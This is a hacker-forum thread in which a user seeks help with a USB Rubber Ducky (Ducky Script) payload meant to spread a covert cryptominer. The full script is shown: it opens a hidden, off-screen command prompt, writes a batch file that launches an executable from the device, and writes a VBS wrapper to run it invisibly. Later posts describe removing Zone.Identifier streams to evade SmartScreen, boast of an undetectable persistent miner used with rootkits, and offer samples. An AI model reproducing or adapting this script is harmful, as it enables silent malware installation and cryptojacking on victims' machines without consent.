Need some help with Ducky Script #2

Not sure if this is the right section or not but it seems the closest. I was following a guide given to be about spreading technique and I found this one more intriguing since I have a silent miner but it doesn’t work on windows 10 with smart screen enabled. Something with zone.indentifier and windows ADS. I dunno. Anyways the guide is a few years old and the encoder page is no longer in service. I found a new one but get an error. Code below:

REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 25
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr
"DUCKY"') do set myd=%%d
ENTER
STRING if Exist %myd% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %myd%\example.exe
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: h xx p://stackoverflow dot com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """",
0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

Using this encoder “h xx ps://ducktoolkit dot com/encoder/” I get the following error below:

Command "DUCKY"') Not in Language File

Any help would be much appreciated. I’m sure it is something small and I’m missing something but I know nothing how hardware talks to devices etc…

Also is there a way to make sure when the USB is plugged into the target that no noise goes off? When a USB is usually inserted into a PC running windows 7, 8 or 8.1.

Thanks in advance. Much appreciated.

Fixed* :slight_smile: If anyone has similar issues let me know. I’ll post the working script.

If you are getting a Smart Screen pop up, it means you are downloading the file from the Internet. If you want to remove that pop up, you will need to delete the Zone ID file of that downloaded file. It will be a hidden file with the name: <name of downloaded file>:Zone.Identifier.

Also, if you are using miners for some kinda monetisation, good luck lol

I’m not getting a smart screen pop up. There was some simply spacing errors in the code. I’m using atom now works a lot better easier on my eyes anyways.

My miner disables it and any ADS windows may provide when downloaded infecting files from the internet. Also depends how well FUD it is which mine are 100%

Thanks for your input though. Why good luck on the miners? Mine work. Especially in numbers. Want to try one out? lol. You won’t be able to reverse engineer it or stop it. Trust me :wink:

Mine will mine to my XMR address. Give me your XMR address and I will give you a custom light sample. Give me a couple hours though.

.exe and I have various setups/scripts for all linux and most unix distros. Best on high end servers and you’ll need a decent rootkit.

Not for windows* just the linux/unix setup. There’s a persistent boot feature in the windows .exe and you cannot get rid of it without the killswitch .exe.

hehe

Is that a challenge? @pry0cc let me borrow your XMR address.

1 Like

Best on high end servers-- of course servers that you have legal ability to penetration test on. :face_with_raised_eyebrow:

This topic was automatically closed after 30 days. New replies are no longer allowed.